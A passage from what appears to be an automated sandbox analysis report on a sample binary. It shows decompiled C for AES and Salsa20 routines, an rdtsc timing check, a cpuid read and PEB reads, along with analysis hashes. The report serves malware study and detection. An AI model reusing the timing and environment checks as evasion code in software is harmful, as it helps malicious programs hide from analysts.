            				_a12 =  *(0x9bd6d8 + (_t499 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t388 >> 0x18) * 4);
            				_t413 = _v12;
            				_t516 = _a12 ^  *(0x9bded8 + (_t413 & 0x000000ff) * 4);
            				_a12 = _t516;
            				_t48 =  &(_t511[6]); // 0x55c35de5
            				_a12 = _t516 ^  *_t48;
            				_t60 =  &(_t511[7]); // 0xec83ec8b
            				_t420 =  *(0x9bdad8 + (_t413 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t499 >> 0x18) * 4) ^  *(0x9bded8 + (_t388 & 0x000000ff) * 4) ^  *_t60;
            				_t512 =  &(_t511[8]);
            				_a8 = (_a8 >> 1) - 1;
            				while(1) {
            					_a4 = _t420;
            					if(_t521 == 0) {
            						break;
            					}
            					_t517 = _a12;
            					_t501 = _v16;
            					_v12 =  *(0x9bdad8 + (_t517 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t501 >> 0x18) * 4) ^  *(0x9bded8 + (_a4 & 0x000000ff) * 4) ^  *_t512;
            					_t85 =  &(_t512[1]); // 0x5350d045
            					_v20 =  *(0x9bdad8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t517 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v8 >> 0x18) * 4) ^  *(0x9bded8 + (_t501 & 0x000000ff) * 4) ^  *_t85;
            					_t434 = _v8;
            					_t97 =  &(_t512[2]); // 0x1692e8
            					_t393 =  *(0x9bd6d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_t501 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t517 >> 0x18) * 4) ^  *(0x9bded8 + (_t434 & 0x000000ff) * 4) ^  *_t97;
            					_t107 =  &(_t512[3]); // 0x14c48300
            					_t507 =  *(0x9bdad8 + (_t434 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t501 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_a4 >> 0x18) * 4) ^  *(0x9bded8 + (_t517 & 0x000000ff) * 4) ^  *_t107;
            					_t118 =  &(_t512[4]); // 0x1374c085
            					_v16 =  *(0x9bdad8 + (_t393 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v12 >> 0x18) * 4) ^  *(0x9bded8 + (_t507 & 0x000000ff) * 4) ^  *_t118;
            					_t130 =  &(_t512[5]); // 0xff0c75ff
            					_v8 =  *(0x9bdad8 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_t393 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_v20 >> 0x18) * 4) ^  *(0x9bded8 + (_v12 & 0x000000ff) * 4) ^  *_t130;
            					_a12 =  *(0x9bd6d8 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bdad8 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t393 >> 0x18) * 4);
            					_t453 = _v20;
            					_t519 = _a12 ^  *(0x9bded8 + (_t453 & 0x000000ff) * 4);
            					_a12 = _t519;
            					_t145 =  &(_t512[6]); // 0xe8530875
            					_a12 = _t519 ^  *_t145;
            					_t156 =  &(_t512[7]); // 0x1637
            					_t420 =  *(0x9bdad8 + (_t453 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9bd6d8 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9bd2d8 + (_t507 >> 0x18) * 4) ^  *(0x9bded8 + (_t393 & 0x000000ff) * 4) ^  *_t156;
            					_t512 =  &(_t512[8]);
            					_t157 =  &_a8;
            					 *_t157 = _a8 - 1;
            					__eflags =  *_t157;
            				}
            				_t394 = _v16;
            				_t509 = _a16;
            				asm("rol ecx, 0x8");
            				asm("ror eax, 0x8");
            				 *_t509 = ( *(0x9be2d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0xff00ff00 | ( *(0x9be2d8 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0x00ff00ff;
            				_t184 =  &(_t512[1]); // 0x5350d045
            				asm("rol ecx, 0x8");
            				asm("ror eax, 0x8");
            				_t509[1] = ( *(0x9be2d8 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0xff00ff00 | ( *(0x9be2d8 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0x00ff00ff;
            				_t197 =  &(_t512[2]); // 0x1692e8
            				asm("ror eax, 0x8");
            				asm("rol ecx, 0x8");
            				_t509[2] = ( *(0x9be2d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0xff00ff00 | ( *(0x9be2d8 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0x00ff00ff;
            				_t210 =  &(_t512[3]); // 0x14c48300
            				asm("rol ecx, 0x8");
            				asm("ror eax, 0x8");
            				_t383 = ( *(0x9be2d8 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0xff00ff00 | ( *(0x9be2d8 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0x00ff00ff;
            				_t509[3] = _t383;
            				return _t383;
            			}

            • Opcode ID: eeec9942841d35b6d33ae33493287d92a6d6fec9a958850709f4050d9d37d1fb
            • Instruction ID: 03e6a2c48c15b871dfe84d2988da3140f1824c50f303e89f24d4aeba2155dbf5
            • Opcode Fuzzy Hash: eeec9942841d35b6d33ae33493287d92a6d6fec9a958850709f4050d9d37d1fb
            • Instruction Fuzzy Hash: 74E16F31A251588FC708CF2DED919B977E0FB49311745422EE656C7392DB38EA22EB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E009B8AF8(signed int* _a4, signed int* _a8, signed int* _a12) {
            				signed int _t164;
            				signed int _t180;
            				signed int* _t197;
            				signed int _t199;
            				signed int* _t216;
            				signed int _t218;
            				signed int* _t222;
            				void* _t223;
            				signed int _t239;
            				signed int _t259;
            				signed int _t277;
            				signed int _t295;
            				signed int* _t298;
            				signed int _t317;
            				signed int _t320;
            				signed int _t324;
            				signed int _t331;
            				signed int _t333;
            				signed int _t335;
            				signed int _t338;
            				signed int _t345;
            				signed int _t347;
            				signed int _t350;
            				signed int _t354;
            				signed char _t357;
            				signed int _t365;
            				signed int* _t366;
            				signed int _t372;
            				signed int* _t373;
            				signed int* _t374;
            				signed int _t381;
            				signed int _t388;
            				signed int _t395;
            				signed int* _t396;
            				signed int* _t398;
            				signed int* _t399;
            				signed int* _t401;
            				signed int* _t402;
            
            				_t298 = _a8;
            				_t399 = _a4;
            				asm("rol eax, 0x8");
            				asm("ror ecx, 0x8");
            				_t3 =  &(_t399[1]); // 0x9b80c0
            				_t396 = _t3;
            				 *_t399 =  *_t298 & 0xff00ff00 |  *_t298 & 0x00ff00ff;
            				asm("ror eax, 0x8");
            				asm("rol ecx, 0x8");
            				 *_t396 = _t298[1] & 0xff00ff00 | _t298[1] & 0x00ff00ff;
            				asm("ror eax, 0x8");
            				asm("rol ecx, 0x8");
            				_t399[2] = _t298[2] & 0xff00ff00 | _t298[2] & 0x00ff00ff;
            				asm("ror edx, 0x8");
            				asm("rol eax, 0x8");
            				_t354 = _t298[3] & 0xff00ff00 | _t298[3] & 0x00ff00ff;
            				_t399[3] = _t354;
            				if(_a12 != 0x80) {
            					asm("ror eax, 0x8");
            					asm("rol ecx, 0x8");
            					_t399[4] = _t298[4] & 0xff00ff00 | _t298[4] & 0x00ff00ff;
            					asm("ror edx, 0x8");
            					asm("rol eax, 0x8");
            					_t357 = _t298[5] & 0xff00ff00 | _t298[5] & 0x00ff00ff;
            					_t399[5] = _t357;
            					if(_a12 != 0xc0) {
            						asm("rol ecx, 0x8");
            						asm("ror eax, 0x8");
            						_t399[6] = _t298[6] & 0xff00ff00 | _t298[6] & 0x00ff00ff;
            						asm("ror eax, 0x8");
            						asm("rol ecx, 0x8");
            						_t164 = _t298[7] & 0xff00ff00 | _t298[7] & 0x00ff00ff;
            						_t399[7] = _t164;
            						if(_a12 != 0x100) {
            							return 0;
            						}
            						_a8 = 0x9bfadc;
            						_t93 =  &(_t399[2]); // 0xc35de58b
            						_t365 = ( *(0x9be2d8 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t164 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
            						_t180 =  *_t396 ^ _t365;
            						_t399[8] = _t365;
            						_t399[9] = _t180;
            						_t98 =  &(_t399[0xc]); // 0x9b80ec
            						_t366 = _t98;
            						_t317 =  *_t93 ^ _t180;
            						_a12 = _t366;
            						_t100 =  &(_t399[3]); // 0x83ec8b55
            						_t399[0xa] = _t317;
            						_t399[0xb] =  *_t100 ^ _t317;
            						do {
            							_t103 = _t366 - 4; // 0x50e0458d
            							_t197 = _a12;
            							_t372 =  *(0x9be2d8 + ( *_t103 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *_t103 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9be2d8 + ( *_t103 >> 0x18) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *_t103 & 0x000000ff) * 4) & 0x000000ff ^  *(_t197 - 0x20);
            							 *_t197 = _t372;
            							_t199 =  *(_t197 - 0x1c) ^ _t372;
            							_t373 = _a12;
            							 *(_t373 + 4) = _t199;
            							_t320 =  *(_t373 - 0x18) ^ _t199;
            							 *(_t373 + 8) = _t320;
            							 *(_t373 + 0xc) =  *(_t373 - 0x14) ^ _t320;
            							_t374 = _t373 + 0x20;
            							_a12 = _t374;
            							_t216 = _a12;
            							_t381 =  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *(_t374 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + ( *(_t374 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t216 - 0x30) ^  *_a8;
            							 *(_t216 - 0x10) = _t381;
            							_t218 =  *(_t216 - 0x2c) ^ _t381;
            							_t366 = _a12;
            							 *(_t366 - 0xc) = _t218;
            							_t324 =  *(_t366 - 0x28) ^ _t218;
            							 *(_t366 - 8) = _t324;
            							 *(_t366 - 4) =  *(_t366 - 0x24) ^ _t324;
            							_t222 =  &(_a8[1]);
            							_a8 = _t222;
            						} while (_t222 != 0x9bfaf4);
            						_push(0xe);
            						L4:
            						_pop(_t223);
            						return _t223;
            					}
            					_t331 = ( *(0x9be2d8 + (_t357 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t357 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t357 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t357 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
            					_t398 = 0x9bfadc;
            					_t239 =  *_t396 ^ _t331;
            					_t399[6] = _t331;
            					_t54 =  &(_t399[2]); // 0xc35de58b
            					_t333 =  *_t54 ^ _t239;
            					_t399[7] = _t239;
            					_t56 =  &(_t399[3]); // 0x83ec8b55
            					_t399[8] = _t333;
            					_t399[9] =  *_t56 ^ _t333;
            					_t401 =  &(_t399[0xa]);
            					do {
            						_t59 = _t401 - 0x18; // 0x75ff29eb
            						_t60 = _t401 - 4; // 0xc918e8a5
            						_t335 =  *_t59 ^  *_t60;
            						_t61 = _t401 - 0x14; // 0x8df98b10
            						 *_t401 = _t335;
            						_t401[1] =  *_t61 ^ _t335;
            						_t63 =  &(_t401[6]); // 0xf48b89
            						_t401 = _t63;
            						_t388 =  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + ( *(_t401 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + ( *(_t401 - 0x14) & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t401 - 0x28) ^  *_t398;
            						_t398 =  &(_t398[1]);
            						 *(_t401 - 0x10) = _t388;
            						_t259 =  *(_t401 - 0x24) ^ _t388;
            						 *(_t401 - 0xc) = _t259;
            						_t338 =  *(_t401 - 0x20) ^ _t259;
            						 *(_t401 - 8) = _t338;
            						 *(_t401 - 4) =  *(_t401 - 0x1c) ^ _t338;
            					} while (_t398 != 0x9bfaf8);
            					_push(0xc);
            					goto L4;
            				}
            				_t345 = ( *(0x9be2d8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x9be2d8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t354 >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t354 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t399;
            				_t277 =  *_t396 ^ _t345;
            				_t399[4] = _t345;
            				_t19 =  &(_t399[2]); // 0xc35de58b
            				_t399[5] = _t277;
            				_t347 =  *_t19 ^ _t277;
            				_t399[6] = _t347;
            				_t399[7] = _t354 ^ _t347;
            				_t402 = 0x9bfadc;
            				do {
            					_t23 =  &(_t396[4]); // 0x120
            					_t396 = _t23;
            					_t395 =  *(0x9be2d8 + (_t396[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9be2d8 + (_t396[2] >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x9be2d8 + (_t396[2] >> 0x18) * 4) & 0x000000ff ^  *(0x9be2d8 + (_t396[2] & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t396 - 4) ^  *_t402;
            					_t402 =  &(_t402[1]);
            					_t396[3] = _t395;
            					_t295 =  *_t396 ^ _t395;
            					_t396[4] = _t295;
            					_t350 = _t396[1] ^ _t295;
            					_t396[5] = _t350;
            					_t396[6] = _t396[2] ^ _t350;
            				} while (_t402 != 0x9bfb00);
            				_push(0xa);
            				goto L4;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            • Opcode ID: 744a22f04afd88f143ecdf441bc442f3e3097070049b9a7ff265ad68e71a8126
            • Instruction ID: fd65134c64b369c214940bf2eb92feb67c5fa0a17bc16ab384616e122b06b724
            • Opcode Fuzzy Hash: 744a22f04afd88f143ecdf441bc442f3e3097070049b9a7ff265ad68e71a8126
            • Instruction Fuzzy Hash: ABD17972B246018FE31CCF2DDD90666B7E5EB8C3117448A3DE59ACB385DA38E911DB90

            C-Code - Quality: 69%
            			E009B8377(void* _a4, void* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _v40;
            				signed int _v44;
            				signed int _v48;
            				signed int _v52;
            				char _v56;
            				signed int _v60;
            				signed int _v64;
            				signed int _v68;
            				signed int _v72;
            				signed int _v76;
            				signed int _v80;
            				signed int _v84;
            				signed int _v88;
            				signed int _v92;
            				signed int _v96;
            				signed int _v100;
            				signed int _v104;
            				signed int _v108;
            				signed int _v112;
            				signed int _v116;
            				void _v120;
            				signed int _t167;
            				signed int _t198;
            				signed int _t200;
            				signed int _t206;
            				signed int _t210;
            				signed int _t216;
            				signed int _t218;
            				signed int _t229;
            				signed int _t230;
            				void* _t232;
            				signed int _t233;
            				signed int _t235;
            				signed int _t236;
            				signed int _t237;
            				signed int _t239;
            				signed int _t240;
            				signed int _t241;
            				signed int _t245;
            				signed int _t247;
            				signed int _t248;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t261;
            				signed int _t262;
            				signed int _t263;
            				signed int _t269;
            				signed int _t270;
            				void* _t272;
            
            				_t233 = 0x10;
            				_v56 = 0xa;
            				memcpy( &_v120, _a8, _t233 << 2);
            				_t245 = _v72;
            				_t235 = _v60;
            				_t239 = _v64;
            				_t269 = _v68;
            				_t229 = _v76;
            				_v8 = _v80;
            				_v36 = _v84;
            				_v24 = _v88;
            				_v48 = _v92;
            				_v44 = _v96;
            				_v32 = _v100;
            				_v20 = _v104;
            				_v40 = _v108;
            				_v16 = _v112;
            				_v12 = _v116;
            				_t167 = _v120;
            				_v52 = _t245;
            				_v28 = _t167;
            				do {
            					asm("rol eax, 0x7");
            					_v20 = _v20 ^ _t167 + _t245;
            					asm("rol eax, 0x9");
            					_v24 = _v24 ^ _v20 + _v28;
            					asm("rol eax, 0xd");
            					_t247 = _v52 ^ _v24 + _v20;
            					_v52 = _t247;
            					asm("rol eax, 0x12");
            					_v28 = _v28 ^ _v24 + _t247;
            					asm("rol eax, 0x7");
            					_v36 = _v36 ^ _v12 + _v32;
            					asm("rol eax, 0x9");
            					_t270 = _t269 ^ _v36 + _v32;
            					_t248 = _v44;
            					asm("rol eax, 0xd");
            					_v12 = _v12 ^ _v36 + _t270;
            					asm("rol eax, 0x12");
            					_v32 = _v32 ^ _v12 + _t270;
            					asm("rol eax, 0x7");
            					_t240 = _t239 ^ _v8 + _t248;
            					asm("rol eax, 0x9");
            					_v16 = _v16 ^ _v8 + _t240;
            					asm("rol eax, 0xd");
            					_t249 = _t248 ^ _v16 + _t240;
            					_v44 = _t249;
            					asm("rol eax, 0x12");
            					_v8 = _v8 ^ _v16 + _t249;
            					asm("rol eax, 0x7");
            					_t251 = _v40 ^ _t229 + _t235;
            					_v40 = _t251;
            					asm("rol eax, 0x9");
            					_t253 = _v48 ^ _t251 + _t235;
            					_v48 = _t253;
            					asm("rol eax, 0xd");
            					_t230 = _t229 ^ _v40 + _t253;
            					asm("rol eax, 0x12");
            					_t236 = _t235 ^ _t253 + _t230;
            					asm("rol eax, 0x7");
            					_v12 = _v12 ^ _v28 + _v40;
            					_t198 = _v12;
            					_v116 = _t198;
            					asm("rol eax, 0x9");
            					_v16 = _v16 ^ _t198 + _v28;
            					_t200 = _v16;
            					_v112 = _t200;
            					asm("rol eax, 0xd");
            					_t255 = _v40 ^ _t200 + _v12;
            					_v40 = _t255;
            					asm("rol eax, 0x12");
            					_v108 = _t255;
            					_t257 = _v28 ^ _v16 + _t255;
            					asm("rol eax, 0x7");
            					_v44 = _v44 ^ _v32 + _v20;
            					_t206 = _v44;
            					_v96 = _t206;
            					asm("rol eax, 0x9");
            					_v28 = _t257;
            					_v120 = _t257;
            					_t259 = _v48 ^ _t206 + _v32;
            					_v48 = _t259;
            					asm("rol eax, 0xd");
            					_v20 = _v20 ^ _v44 + _t259;
            					_t210 = _v20;
            					_v104 = _t210;
            					asm("rol eax, 0x12");
            					_v92 = _t259;
            					_t261 = _v32 ^ _t210 + _t259;
            					_v32 = _t261;
            					_v100 = _t261;
            					_t262 = _v36;
            					asm("rol eax, 0x7");
            					_t229 = _t230 ^ _v8 + _t262;
            					asm("rol eax, 0x9");
            					_v24 = _v24 ^ _v8 + _t229;
            					_t216 = _v24;
            					_v88 = _t216;
            					asm("rol eax, 0xd");
            					_t263 = _t262 ^ _t216 + _t229;
            					_t218 = _t263;
            					_v36 = _t263;
            					_v84 = _t218;
            					asm("rol eax, 0x12");
            					_v8 = _v8 ^ _t218 + _v24;
            					_v80 = _v8;
            					asm("rol eax, 0x7");
            					_t245 = _v52 ^ _t236 + _t240;
            					_v52 = _t245;
            					_v72 = _t245;
            					asm("rol eax, 0x9");
            					_t269 = _t270 ^ _t236 + _t245;
            					asm("rol eax, 0xd");
            					_t239 = _t240 ^ _t269 + _t245;
            					asm("rol eax, 0x12");
            					_t235 = _t236 ^ _t239 + _t269;
            					_t134 =  &_v56;
            					 *_t134 = _v56 - 1;
            					_t167 = _v28;
            				} while ( *_t134 != 0);
            				_v76 = _t229;
            				_v64 = _t239;
            				_t241 = 0;
            				_v60 = _t235;
            				_t232 = _a8 -  &_v120;
            				_v68 = _t269;
            				do {
            					 *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) =  *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) +  *((intOrPtr*)(_t272 + _t232 + _t241 * 4 - 0x74));
            					_t241 = _t241 + 1;
            				} while (_t241 < 0x10);
            				_t237 = 0x10;
            				return memcpy(_a4,  &_v120, _t237 << 2);
            			}

            • Opcode ID: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
            • Instruction ID: 06680ded3fb545784d99eb9532d8f15b124c7e2121d0aa0d26d9566c037fc137
            • Opcode Fuzzy Hash: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
            • Instruction Fuzzy Hash: 7BA17C76D002099FCF80CFA9C981ADEFBF5BF88254F24416AE414F7201E274AA558B94

            C-Code - Quality: 72%
            			E009B58B3(signed char __eax, signed int __edx, signed char* _a4) {
            				void* _v5;
            				signed char _v12;
            				signed char _v20;
            				signed char _t11;
            				void* _t12;
            				void* _t14;
            				signed char _t19;
            				void* _t23;
            				signed char _t25;
            				signed char _t28;
            				signed int _t29;
            				signed int _t31;
            				signed char _t32;
            				signed int _t34;
            				void* _t36;
            				signed int _t38;
            				signed int _t40;
            				void* _t42;
            
            				_t29 = __edx;
            				_t11 = __eax;
            				_t23 = 0;
            				do {
            					asm("rdtsc");
            					_t32 = _t11;
            					_t12 = E009B595D();
            					asm("rdtsc");
            					_v20 = _t12 - _t32;
            					asm("sbb ecx, edi");
            					_v12 = _t29;
            					_t14 = E009B595D();
            					_t25 = _v20;
            					asm("rdtsc");
            					asm("sbb edx, [ebp-0x8]");
            					_t11 = _t14 - _t25 - _t32;
            					_v20 = _t11;
            					asm("sbb edx, edi");
            					_t31 = _v12;
            					_t38 = _t31;
            					if(_t38 <= 0 && (_t38 < 0 || _t25 <= 0xffffffff)) {
            						_t40 = _t29;
            						if(_t40 <= 0 && (_t40 < 0 || _t11 <= 0xffffffff)) {
            							_t34 = _t25 - _t11;
            							asm("sbb edi, edx");
            							asm("cdq");
            							_t11 = _t31 ^ _t29;
            							_t36 = (_t34 ^ _t29) - _t29;
            							_t42 = _t36;
            							asm("sbb eax, edx");
            							_v12 = _t11;
            							if(_t42 >= 0 && (_t42 > 0 || _t36 >= 0x40)) {
            								_v5 = E009B57E7(_t25);
            								_t19 = E009B57E7(_v20);
            								_t28 = _v5;
            								_t11 = _t19 ^ _t28;
            								if(_t11 != 0) {
            									 *_a4 = _t28;
            									return 1;
            								}
            							}
            						}
            					}
            					_t23 = _t23 + 1;
            				} while (_t23 < 0x80);
            				return 0;
            			}

            Similarity
            • API ID: time$Time$BeginPeriodSleep
            • API String ID: 4118631919-0
            • Opcode ID: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
            • Instruction ID: 2b08933de68568a7ecdccdb44ccf12448b09c50fbb00283c68c24964705cb044
            • Opcode Fuzzy Hash: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
            • Instruction Fuzzy Hash: 08115B71E10B65DBAF1C9F7C4A907DDBBEADEC5B70B5B4769E824E3290E5318C048280

            C-Code - Quality: 62%
            			E009B4C25(intOrPtr __edx, intOrPtr _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				char _v28;
            				intOrPtr _t13;
            				intOrPtr* _t17;
            				intOrPtr* _t24;
            
            				_t13 = 0;
            				_v8 = 0;
            				_v12 = _a4;
            				do {
            					_push(_t17);
            					asm("cpuid");
            					_t24 = _t17;
            					_t17 =  &_v28;
            					 *_t17 = _t13 + 0x80000002;
            					 *((intOrPtr*)(_t17 + 4)) = _t24;
            					_t13 = _v8 + 1;
            					 *((intOrPtr*)(_t17 + 8)) = 0;
            					 *((intOrPtr*)(_t17 + 0xc)) = __edx;
            					_v8 = _t13;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					_v12 = _v12 + 0x10;
            				} while (_t13 < 3);
            				return _a4;
            			}

            • Opcode ID: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
            • Instruction ID: 27e617986ca5d35448a9a27dd2a2979f6a4811aa2da2b353f425bed14302d43c
            • Opcode Fuzzy Hash: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
            • Instruction Fuzzy Hash: A5F0FFB1901218AF8B45CF5DD88559EFBF5EF49264F6581AAE808EB301D2719A418B90

            C-Code - Quality: 100%
            			E009B5408() {
            
            				return ( *( *[fs:0x30] + 0xa4) & 0x000000ff) << 0x00000008 |  *( *[fs:0x30] + 0xa8) & 0x000000ff;
            			}

            • Opcode ID: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
            • Instruction ID: 2f92208e2cd7eb6c465aa2c1d9d9ad2e0d5e4d52fdcf87f58a77acdaf95c176a
            • Opcode Fuzzy Hash: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
            • Instruction Fuzzy Hash: 15B092682066D149C396621582B83B07FA0EB83556F2800FD94EB0E883855E021BDB11

            C-Code - Quality: 100%
            			E009B5083() {
            
            				return  *[fs:0x30];
            			}

            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0

            C-Code - Quality: 48%
            			E009B41C3() {
            				long _v8;
            				void* _v12;
            				long _v16;
            				void* _v20;
            				long _v24;
            				void _v28;
            				char _v32;
            				void* _v44;
            				long _v48;
            				void* _v62;
            				void _v88;
            				char _v152;
            				char _v156;
            				signed int _t38;
            				signed int _t43;
            				int _t46;
            				int _t48;
            				void* _t51;
            				int _t58;
            				void* _t61;
            				WCHAR* _t77;
            				signed int _t78;
            				void* _t90;
            				void* _t92;
            				void* _t93;
            
            				_t78 = 6;
